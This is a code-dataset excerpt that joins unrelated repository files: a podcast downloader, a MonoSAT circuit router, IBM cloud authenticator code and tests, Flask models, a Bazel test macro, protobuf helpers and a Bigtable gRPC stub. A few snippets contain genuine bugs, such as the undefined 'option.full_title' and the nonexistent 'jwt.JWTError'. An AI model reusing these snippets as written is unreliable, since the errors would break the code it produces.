sp.saveoutputs(outputDir,F_out,snow_speed_out,icb_speed_out,Q_cmb, Qs, Qs_slurry, \
Qs_oc, Ql, Qg, Qg_oc, Qg_slurry, cooling_rate_out, \
cmb_temp,acore,state)
print('Run {} is saved'.format(outputDir))
return (outputDir, r_out, temp_out, xi_out, j_out, F_out, icb_speed_out, density)
``` |
{
"source": "jo1gi/podcast-dl",
"score": 2
} |
#### File: podcast-dl/podcastdl/main.py
```python
from . import arguments, search, download
def run():
try:
options = arguments.parse_args()
if not options.search == None:
search_results = search.search(options.search)
if search_results == None:
print("Could not find any podcasts")
exit()
search.print_results(search_results)
if not options.url == None:
download.download(
options.url,
limit=options.limit,
oldest=not options.newest,
full_title=option.full_title,
overwrite=options.overwrite,
)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
run()
```
#### File: podcast-dl/podcastdl/networking.py
```python
import requests, json
def get(url, status_code=None, **kwargs):
"""Downloads data from the given url"""
try:
resp = requests.get(url, **kwargs)
if not status_code == None:
if not resp.status_code == status_code:
return None
return resp.content
except Exception as e:
return None
def get_json(url, **kwargs):
"""Downloads json data and converts it to a dict"""
raw = get(url, **kwargs)
if raw == None:
return None
return json.loads(raw.decode('utf8'))
``` |
{
"source": "jo285317/monosat",
"score": 2
} |
#### File: examples/routing/router.py
```python
from monosat import *
from time import time
import pcrt
import itertools
#There are many ways to perform circuit routing using MonoSAT.
#The approach uses just one graph, and uses a combination of MonoSAT's built-in reachability constraints to ensure
#nets are routed, while using propositional constraints over the edges in the graph to prevent nets from intersecting.
#This function also supports a slightly more complex router, which combines reachability and maximum flow constraints.
#The maximum flow constraint is not powerful enough to ensure correct routing, but is a (safe) overapproximative
#constraint, that allows the solver to prune large parts of the search space early.
#
#The variation described here supports on 2-terminal routing; use router_multi.py for multi-terminal routing.
#Finally, for the special case of Escape Routing (in which the destinations are interchangeable), see
#
#Bayless, Sam, <NAME>, and <NAME>. "Scalable, high-quality, SAT-based multi-layer escape routing."
#Computer-Aided Design (ICCAD), 2016 IEEE/ACM International Conference on. IEEE, 2016.
def route(filename, monosat_args,use_maxflow=False, draw_solution=True, outputFile = None):
(width, height),diagonals,nets,constraints,disabled = pcrt.read(filename)
print(filename)
print("Width = %d, Height = %d, %d nets, %d constraints, %d disabled"%(width,height,len(nets),len(constraints), len(disabled)))
if diagonals:
print("45-degree routing")
else:
print("90-degree routing")
for net in nets:
if(len(net)!=2):
raise Exception("router.py only supports routing nets with exactly 2 vertices. Use router_multi.py for routing nets with 2+ vertices.")
if(len(monosat_args)>0):
args = " ".join(monosat_args)
print("MonoSAT args: " + args)
Monosat().newSolver(args)
if outputFile is not None:
print("Writing output to " + outputFile)
Monosat().setOutputFile(outputFile)
g = Graph()
print("Building grid")
edges = dict()
grid = dict()
for x in range(width):
for y in range(height):
n = g.addNode("%d_%d"%(x,y))
grid[(x,y)] = n
edges[(x,y)]=[]
disabled_nodes = set(disabled)
undirected_edges = dict()
#create undirected edges between neighbouring nodes
if draw_solution:
#the dicts here are only used to print the solution at the end. Disable for benchmarking.
lefts = dict()
rights = dict()
ups = dict()
downs = dict()
down_lefts = dict()
up_rights = dict()
down_rights = dict()
up_lefts = dict()
start_nodes = set()
end_nodes = set()
net_nodes = set()
for net in nets:
assert(len(net)==2)
start_nodes.add(net[0])
end_nodes.add(net[1])
for (x,y) in net:
net_nodes.add((x,y))
#create undirected edges between neighbouring nodes
def makeEdge(n,r):
e = None
if n not in disabled_nodes and r not in disabled_nodes:
if n in net_nodes or r in net_nodes:
#only add directed edges for start/end nodes.
allow_out=True
allow_in = True
if n in start_nodes or r in end_nodes:
allow_in=False
if n in end_nodes or r in start_nodes:
allow_out = False
assert(not (allow_in and allow_out))
if allow_out:
e = g.addEdge(grid[n], grid[r]) #add a _directed_ edge from n to r
undirected_edges[e]=e
elif allow_in:
e = g.addEdge(grid[r], grid[n]) # add a _directed_ edge from r to n
undirected_edges[e]=e
else:
e=None
else:
#add undirected edges for other nodes in the grid
e = g.addEdge(grid[n],grid[r]) #in monosat, undirected edges are specified by creating
undirected_edges[e]=e
e2 = g.addEdge(grid[r],grid[n]) #directed edges in both directions, and making them equal
undirected_edges[e2]=e
AssertEq(e,e2)
if e is not None:
edges[n].append(e)
edges[r].append(e)
return e
for x in range(width):
for y in range(height):
n = (x,y)
if n in disabled_nodes:
continue
if x<width-1:
r = (x+1,y)
e = makeEdge(n,r)
if e is not None and draw_solution:
rights[n] = e
lefts[r] = e
if y<height-1:
r = (x,y+1)
e = makeEdge(n,r)
if e is not None and draw_solution:
downs[n] = e
ups[r] = e
if diagonals:
#if 45 degree routing is enabled
diag_up=None
diag_down=None
if x<width-1 and y<height-1:
r = (x+1,y+1)
e = makeEdge(n,r)
diag_down = e
if e is not None and draw_solution:
down_rights[n] = e
up_lefts[r] = e
if x>0 and y<height-1 and False:
r = (x-1,y+1)
e = makeEdge(n,r)
diag_up = e
if e is not None and draw_solution:
down_lefts[n] = e
up_rights[r] = e
if diag_up and diag_down:
AssertNand(diag_up, diag_down) #cannot route both diagonals
if len(constraints)>0:
print("Enforcing constraints")
vertex_used = dict()
for x in range(width):
for y in range(height):
vertex_used[(x, y)] = Or(edges[(x, y)]) # A vertex is used exactly if one of its edges is enabled
for constraint in constraints:
if len(constraint)>1:
#a constraint is a list of vertices of which at most one can be used
vertex_used_list = []
for node in constraint:
vertex_used_list.append(vertex_used[node])
if(len(vertex_used_list)<20):
for a,b in itertools.combinations(vertex_used_list, 2):
AssertOr(~a,~b) #in every distinct pair of edges, at least one must be false
else:
AssertAtMostOne(vertex_used_list) #use more expensive, but more scalable, built-in AMO theory
print("Enforcing net separation")
#enforce that at any node that is not a starting/ending node, either exactly 2, or exactly no, edges are enabled
#this approach ensures acyclicity, and also ensures that nodes from one net do not reach any other net.
#However, this approach cannot be used to route trees.
for x in range(width):
for y in range(height):
n = (x,y)
edge_list = edges[n]
if n in net_nodes:
#n is a start or end node in the net.
#no constraint is required, as only directed edges are available at start/end nodes
pass
else:
#n is not a start or end node; either exactly 2, or exactly 0, adjacent edges must be enabled
#There are many ways to actually enforce that constraint, not clear what the best option is
#This is slightly complicated by edge nodes/corner nodes having fewer neighbours.
if len(edge_list)>2:
AssertNand(edge_list) #At least one edge must be disabled
if len(edge_list)>=4:
#All but two edges must be disabled.
#This uses up to ~28 constraints. It might be better to implement this using PB constraints instead.
disabled_two = false()
for pair in itertools.combinations(edge_list, len(edge_list)-2):
disabled_two = Or(disabled_two, Nor(pair))
Assert(disabled_two)
print("Enforcing net routing")
#enforce reachability using MonoSAT's builtin reachability constraints
#notice that unreachability between different nets does not need to be explicitly enforced here, because of the
#edge constraints above.
reach_constraints = []
for net in nets:
assert(len(net)==2)
n1 = net[0]
n2 = net[1]
r = g.reaches(grid[n1],grid[n2])
reach_constraints.append(r)
Assert(r)
r.setDecisionPriority(1); #decide reachability before considering regular variable decisions
#optional: use a maximum flow constraint, as an overapprox of disjoint reachability.
if use_maxflow:
print("Enforcing maxflow constraint")
#add a source and dest node, with 1 capacity from source to each net start vertex, and 1 capacity from each net end vertex to dest
source = g.addNode()
dest = g.addNode()
for net in nets:
Assert(g.addEdge(source,grid[net[0]],1)) #directed edges!
Assert(g.addEdge(grid[net[1]],dest, 1)) #directed edges!
m = g.maxFlowGreaterOrEqualTo(source,dest,len(nets))
Assert(m)
m.setDecisionPriority(-1); # never make decisions on the maxflow predicate.
if outputFile is not None:
print("Wrote constraints to " + outputFile + ", exiting without solving")
sys.exit(0)
print("Solving...")
if Solve():
print("Solved!")
if draw_solution:
paths = set() #collect all the edges that make up the routing
for r in reach_constraints:
path = g.getPath(r,True)
for e in path:
assert(e.value())
if e in undirected_edges.keys():
e = undirected_edges[e] #normalize the edge var
paths.add(e)
#print the solution to the console
for y in range(height):
for x in range(width):
n = (x,y)
if (x,y) in net_nodes:
print("*",end="")
else:
print(" ",end="")
if x<width-1:
r = (x+1,y)
if n in rights:
e = rights[n]
if e in paths:
print("-",end="")
else:
print(" ",end="")
else:
print(" ", end="")
print()
for x in range(width):
n = (x, y)
if y<height-1:
r = (x,y+1)
if n in downs:
e = downs[n]
if e in paths:
print("|",end="")
else:
print(" ",end="")
else:
print(" ", end="")
drew_diag=False
if diagonals:
if y<height-1 and x<width-1:
r = (x+1,y+1)
if n in down_rights:
e = down_rights[n]
if e in paths:
print("\\",end="")
drew_diag=True
if y>0 and x<width-1:
n = (x, y+1)
r = (x+1,y)
if n in up_rights:
e = up_rights[n]
if e in paths:
print("/",end="")
assert(not drew_diag)
drew_diag=True
if not drew_diag:
print(" ", end="")
print()
print("s SATISFIABLE")
sys.exit(10)
else:
print("s UNSATISFIABLE")
sys.exit(20)
if __name__ == '__main__':
import sys
monosat_args = ['-ruc'] #default argument for MonoSAT; enables the heuristics described in "Routing Under Constraints", FMCAD 2016, <NAME>
if len(sys.argv)<2:
print("Usage: router.py [monosat arguments] filename.pcrt")
sys.exit(1)
use_maxflow=False
for i,arg in enumerate(sys.argv):
if sys.argv[i].startswith("--use-maxflow"):
use_maxflow = True
del(sys.argv[i])
break
outputFile = None
for i,arg in enumerate(sys.argv):
if sys.argv[i].startswith("--output"):
outputFile = sys.argv[i+1]
del(sys.argv[i])
del(sys.argv[i])
break
if len(sys.argv) > 2:
monosat_args = sys.argv[1:-1]
route(sys.argv[-1], monosat_args,use_maxflow,True, outputFile)
``` |
{
"source": "jo2hu6/home-assistant",
"score": 2
} |
#### File: ibm_cloud_sdk_core/authenticators/cp4d_authenticator.py
```python
from .authenticator import Authenticator
from ..cp4d_token_manager import CP4DTokenManager
from ..utils import has_bad_first_or_last_char
class CloudPakForDataAuthenticator(Authenticator):
authentication_type = 'cp4d'
def __init__(self,
username,
password,
url,
disable_ssl_verification=False,
headers=None,
proxies=None):
"""
:attr str username: The username
:attr str password: The password
:attr str url: The url for authentication
:attr bool disable_ssl_verification: enables/ disabled ssl verification
:attr dict headers: user-defined headers
:attr dict proxies: user-defined proxies
"""
self.token_manager = CP4DTokenManager(
username, password, url, disable_ssl_verification, headers, proxies)
self.validate()
def validate(self):
"""
Performs validation on input params
"""
if self.token_manager.username is None or self.token_manager.password is None:
raise ValueError('The username and password shouldn\'t be None.')
if self.token_manager.url is None:
raise ValueError('The url shouldn\'t be None.')
if has_bad_first_or_last_char(
self.token_manager.username) or has_bad_first_or_last_char(self.token_manager.password):
raise ValueError(
'The username and password shouldn\'t start or end with curly brackets or quotes. '
'Please remove any surrounding {, }, or \" characters.')
if has_bad_first_or_last_char(self.token_manager.url):
raise ValueError(
'The url shouldn\'t start or end with curly brackets or quotes. '
'Please remove any surrounding {, }, or \" characters.')
def authenticate(self, req):
"""
Adds the Authorization header, if applicable
"""
headers = req.get('headers')
bearer_token = self.token_manager.get_token()
headers['Authorization'] = 'Bearer {0}'.format(bearer_token)
def set_disable_ssl_verification(self, status=False):
"""
Sets the ssl verification to enabled or disabled
"""
self.token_manager.set_disable_ssl_verification(status)
def set_headers(self, headers):
"""
Sets user-defined headers
"""
self.token_manager.set_headers(headers)
def set_proxies(self, proxies):
"""
Sets the proxies
"""
self.token_manager.set_proxies(proxies)
```
#### File: site-packages/test/test_cp4d_authenticator.py
```python
import pytest
import responses
import time
import jwt
import json
from ibm_cloud_sdk_core.authenticators import CloudPakForDataAuthenticator
def test_iam_authenticator():
authenticator = CloudPakForDataAuthenticator(
'my_username', 'my_password', 'http://my_url')
assert authenticator is not None
assert authenticator.token_manager.url == 'http://my_url/v1/preauth/validateAuth'
assert authenticator.token_manager.username == 'my_username'
assert authenticator.token_manager.password == '<PASSWORD>'
assert authenticator.token_manager.disable_ssl_verification is False
assert authenticator.token_manager.headers is None
assert authenticator.token_manager.proxies is None
authenticator.set_disable_ssl_verification(True)
assert authenticator.token_manager.disable_ssl_verification is True
with pytest.raises(TypeError) as err:
authenticator.set_headers('dummy')
assert str(err.value) == 'headers must be a dictionary'
authenticator.set_headers({'dummy': 'headers'})
assert authenticator.token_manager.headers == {'dummy': 'headers'}
with pytest.raises(TypeError) as err:
authenticator.set_proxies('dummy')
assert str(err.value) == 'proxies must be a dictionary'
authenticator.set_proxies({'dummy': 'proxies'})
assert authenticator.token_manager.proxies == {'dummy': 'proxies'}
def test_iam_authenticator_validate_failed():
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', None, 'my_url')
assert str(err.value) == 'The username and password shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator(None, 'my_password', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', 'my_password', None)
assert str(err.value) == 'The url shouldn\'t be None.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('{my_username}', 'my_password', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', '{my_password}', 'my_url')
assert str(err.value) == 'The username and password shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
with pytest.raises(ValueError) as err:
CloudPakForDataAuthenticator('my_username', 'my_password', '{my_url}')
assert str(err.value) == 'The url shouldn\'t start or end with curly brackets or quotes. Please remove any surrounding {, }, or \" characters.'
@responses.activate
def test_get_token():
url = "https://test"
access_token_layout = {
"username": "dummy",
"role": "Admin",
"permissions": [
"administrator",
"manage_catalog"
],
"sub": "admin",
"iss": "sss",
"aud": "sss",
"uid": "sss",
"iat": 1559324664,
"exp": 1559324664
}
access_token = jwt.encode(access_token_layout,
'secret', algorithm='HS256',
headers={'kid': '230498151c214b788dd97f22b85410a5'}).decode('utf-8')
response = {
"accessToken": access_token,
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1524167011,
"refresh_token": "<PASSWORD>"
}
responses.add(responses.GET, url + '/v1/preauth/validateAuth', body=json.dumps(response), status=200)
authenticator = CloudPakForDataAuthenticator(
'my_username', '<PASSWORD>', url)
request = {'headers': {}}
authenticator.authenticate(request)
assert request['headers']['Authorization'] is not None
``` |
{
"source": "jo2in/PythonFlaskTutorial",
"score": 2
} |
#### File: src/helloworld/models.py
```python
import jwt
from datetime import datetime, timedelta
from hashlib import md5
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from helloworld import app, db
from helloworld import login
@login.user_loader
def load_user(id):
return User.query.get(int(id))
subscriptions = db.Table('subscriptions',
db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),
db.Column('course_id', db.Integer, db.ForeignKey('course.id'), primary_key=True)
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(128), index=True, unique=True)
password_hash = db.Column(db.String(128))
last_seen = db.Column(db.DateTime, default=datetime.utcnow())
courses = db.relationship('Course', secondary=subscriptions,
backref=db.backref('course_participant', lazy=True), lazy='dynamic')
def get_reset_password_token(self, expires_in=600):
return jwt.encode(
{'reset_password': self.id, 'exp': datetime.now() + timedelta(seconds=expires_in)},
app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')
@staticmethod
def verify_reset_password_token(token):
try:
id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['reset_password']
except jwt.JWTError as e:
app.logger.error('Decoding error: {}'.format(e))
return
return User.query.get(id)
def avatar(self, size=128):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(digest, size)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def subscribe(self, course):
self.courses.append(course)
def unsubscribe(self, course):
self.courses.remove(course)
def __repr__(self):
return '<User {}>'.format(self.username)
class Course(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(140))
description = db.Column(db.String(140), index=True)
subscribers = db.relationship('User', secondary=subscriptions,
backref=db.backref('subscribed_courses', lazy=True), lazy='dynamic')
def __repr__(self):
return '<Course {}>'.format(self.title)
``` |
{
"source": "jo2y/copybara",
"score": 2
} |
#### File: copybara/integration/cram.bzl
```python
def cram_test(name, srcs, deps=[]):
for s in srcs:
testname = name + '_' + s
script = testname + '_script.sh'
gr = "_gen_" + script
# This genrule is a kludge, and at some point we should move
# to a real rule
# (http://bazel.io/docs/skylark/rules.html). What this does is
# it builds a "bash script" whose first line execs cram on the
# script. Conveniently, that first line is a comment as far as
# cram is concerned (it's not indented at all), so everything
# just works.
native.genrule(name=gr,
srcs=[s],
outs=[script],
cmd=("echo 'exec $${TEST_SRCDIR}/copybara/integration/cram " +
"--xunit-file=$$XML_OUTPUT_FILE $$0' > \"$@\" ; " +
"cat $(SRCS) >> \"$@\""),
)
native.sh_test(name=testname,
srcs=[script],
data=["//copybara/integration:cram"] + deps,
)
``` |
{
"source": "jo2y/google-cloud-python",
"score": 2
} |
#### File: google/api_core/protobuf_helpers.py
```python
import collections
import inspect
from google.protobuf.message import Message
_SENTINEL = object()
def from_any_pb(pb_type, any_pb):
"""Converts an ``Any`` protobuf to the specified message type.
Args:
pb_type (type): the type of the message that any_pb stores an instance
of.
any_pb (google.protobuf.any_pb2.Any): the object to be converted.
Returns:
pb_type: An instance of the pb_type message.
Raises:
TypeError: if the message could not be converted.
"""
msg = pb_type()
if not any_pb.Unpack(msg):
raise TypeError(
'Could not convert {} to {}'.format(
any_pb.__class__.__name__, pb_type.__name__))
return msg
def check_oneof(**kwargs):
"""Raise ValueError if more than one keyword argument is not ``None``.
Args:
kwargs (dict): The keyword arguments sent to the function.
Raises:
ValueError: If more than one entry in ``kwargs`` is not ``None``.
"""
# Sanity check: If no keyword arguments were sent, this is fine.
if not kwargs:
return
not_nones = [val for val in kwargs.values() if val is not None]
if len(not_nones) > 1:
raise ValueError('Only one of {fields} should be set.'.format(
fields=', '.join(sorted(kwargs.keys())),
))
def get_messages(module):
"""Discovers all protobuf Message classes in a given import module.
Args:
module (module): A Python module; :func:`dir` will be run against this
module to find Message subclasses.
Returns:
dict[str, Message]: A dictionary with the Message class names as
keys, and the Message subclasses themselves as values.
"""
answer = collections.OrderedDict()
for name in dir(module):
candidate = getattr(module, name)
if inspect.isclass(candidate) and issubclass(candidate, Message):
answer[name] = candidate
return answer
def _resolve_subkeys(key, separator='.'):
"""Resolve a potentially nested key.
If the key contains the ``separator`` (e.g. ``.``) then the key will be
split on the first instance of the subkey::
>>> _resolve_subkeys('a.b.c')
('a', 'b.c')
>>> _resolve_subkeys('d|e|f', separator='|')
('d', 'e|f')
If not, the subkey will be :data:`None`::
>>> _resolve_subkeys('foo')
('foo', None)
Args:
key (str): A string that may or may not contain the separator.
separator (str): The namespace separator. Defaults to `.`.
Returns:
Tuple[str, str]: The key and subkey(s).
"""
parts = key.split(separator, 1)
if len(parts) > 1:
return parts
else:
return parts[0], None
def get(msg_or_dict, key, default=_SENTINEL):
"""Retrieve a key's value from a protobuf Message or dictionary.
Args:
mdg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key to retrieve from the object.
default (Any): If the key is not present on the object, and a default
is set, returns that default instead. A type-appropriate falsy
default is generally recommended, as protobuf messages almost
always have default values for unset values and it is not always
possible to tell the difference between a falsy value and an
unset one. If no default is set then :class:`KeyError` will be
raised if the key is not present in the object.
Returns:
Any: The return value from the underlying Message or dict.
Raises:
KeyError: If the key is not found. Note that, for unset values,
messages and dictionaries may not have consistent behavior.
TypeError: If ``msg_or_dict`` is not a Message or Mapping.
"""
# We may need to get a nested key. Resolve this.
key, subkey = _resolve_subkeys(key)
# Attempt to get the value from the two types of objects we know about.
# If we get something else, complain.
if isinstance(msg_or_dict, Message):
answer = getattr(msg_or_dict, key, default)
elif isinstance(msg_or_dict, collections.Mapping):
answer = msg_or_dict.get(key, default)
else:
raise TypeError(
'get() expected a dict or protobuf message, got {!r}.'.format(
type(msg_or_dict)))
# If the object we got back is our sentinel, raise KeyError; this is
# a "not found" case.
if answer is _SENTINEL:
raise KeyError(key)
# If a subkey exists, call this method recursively against the answer.
if subkey is not None and answer is not default:
return get(answer, subkey, default=default)
return answer
def _set_field_on_message(msg, key, value):
"""Set helper for protobuf Messages."""
# Attempt to set the value on the types of objects we know how to deal
# with.
if isinstance(value, (collections.MutableSequence, tuple)):
# Clear the existing repeated protobuf message of any elements
# currently inside it.
while getattr(msg, key):
getattr(msg, key).pop()
# Write our new elements to the repeated field.
for item in value:
if isinstance(item, collections.Mapping):
getattr(msg, key).add(**item)
else:
# protobuf's RepeatedCompositeContainer doesn't support
# append.
getattr(msg, key).extend([item])
elif isinstance(value, collections.Mapping):
# Assign the dictionary values to the protobuf message.
for item_key, item_value in value.items():
set(getattr(msg, key), item_key, item_value)
elif isinstance(value, Message):
getattr(msg, key).CopyFrom(value)
else:
setattr(msg, key, value)
def set(msg_or_dict, key, value):
"""Set a key's value on a protobuf Message or dictionary.
Args:
msg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key to set.
value (Any): The value to set.
Raises:
TypeError: If ``msg_or_dict`` is not a Message or dictionary.
"""
# Sanity check: Is our target object valid?
if not isinstance(msg_or_dict, (collections.MutableMapping, Message)):
raise TypeError(
'set() expected a dict or protobuf message, got {!r}.'.format(
type(msg_or_dict)))
# We may be setting a nested key. Resolve this.
basekey, subkey = _resolve_subkeys(key)
# If a subkey exists, then get that object and call this method
# recursively against it using the subkey.
if subkey is not None:
if isinstance(msg_or_dict, collections.MutableMapping):
msg_or_dict.setdefault(basekey, {})
set(get(msg_or_dict, basekey), subkey, value)
return
if isinstance(msg_or_dict, collections.MutableMapping):
msg_or_dict[key] = value
else:
_set_field_on_message(msg_or_dict, key, value)
def setdefault(msg_or_dict, key, value):
"""Set the key on a protobuf Message or dictionary to a given value if the
current value is falsy.
Because protobuf Messages do not distinguish between unset values and
falsy ones particularly well (by design), this method treats any falsy
value (e.g. 0, empty list) as a target to be overwritten, on both Messages
and dictionaries.
Args:
msg_or_dict (Union[~google.protobuf.message.Message, Mapping]): the
object.
key (str): The key on the object in question.
value (Any): The value to set.
Raises:
TypeError: If ``msg_or_dict`` is not a Message or dictionary.
"""
if not get(msg_or_dict, key, default=None):
set(msg_or_dict, key, value)
```
#### File: bigtable_admin_v2/proto/bigtable_table_admin_pb2_grpc.py
```python
import grpc
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2 as google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2 as google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2
from google.longrunning import operations_pb2 as google_dot_longrunning_dot_operations__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class BigtableTableAdminStub(object):
"""Service for creating, configuring, and deleting Cloud Bigtable tables.
Provides access to the table schemas only, not the data stored within
the tables.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CreateTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.CreateTableFromSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CreateTableFromSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CreateTableFromSnapshotRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ListTables = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ListTables',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListTablesResponse.FromString,
)
self.GetTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GetTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetTableRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.DeleteTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DeleteTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteTableRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ModifyColumnFamilies = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ModifyColumnFamilies',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ModifyColumnFamiliesRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Table.FromString,
)
self.DropRowRange = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DropRowRange',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DropRowRangeRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GenerateConsistencyToken = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GenerateConsistencyToken',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GenerateConsistencyTokenResponse.FromString,
)
self.CheckConsistency = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/CheckConsistency',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.CheckConsistencyResponse.FromString,
)
self.SnapshotTable = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/SnapshotTable',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.SnapshotTableRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.GetSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/GetSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.GetSnapshotRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_table__pb2.Snapshot.FromString,
)
self.ListSnapshots = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/ListSnapshots',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.ListSnapshotsResponse.FromString,
)
self.DeleteSnapshot = channel.unary_unary(
'/google.bigtable.admin.v2.BigtableTableAdmin/DeleteSnapshot',
request_serializer=google_dot_cloud_dot_bigtable_dot_admin__v2_dot_proto_dot_bigtable__table__admin__pb2.DeleteSnapshotRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class BigtableTableAdminServicer(object):
"""Service for creating, configuring, and deleting Cloud Bigtable tables.
Provides access to the table schemas only, not the data stored within
the tables.
"""
def CreateTable(self, request, context):
"""Creates a new table in the specified instance.
The table can be created with a full set of initial column families,
specified in the request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateTableFromSnapshot(self, request, context):
"""This is a private alpha release of Cloud Bigtable snapshots. This feature
is not currently available to most Cloud Bigtable customers. This feature
might be changed in backward-incompatible ways and is not recommended for
production use. It is not subject to any SLA or deprecation policy.
Creates a new table from the specified snapshot. The target table must
not exist. The snapshot and the table must be in the same instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListTables(self, request, context):
"""Lists all tables served from a specified instance.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetTable(self, request, context):
"""Gets metadata information about the specified table.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteTable(self, request, context):
"""Permanently deletes a specified table and all of its data.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModifyColumnFamilies(self, request, context):
"""Performs a series of column family modifications on the specified table.
Either all or none of the modifications will occur before this method
returns, but data requests received prior to that point may see a table
where only some modifications have taken effect.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DropRowRange(self, request, context):
"""Permanently drop/delete a row range from a specified table. The request can
specify whether to delete all rows in a table, or only those that match a
particular prefix.
"""
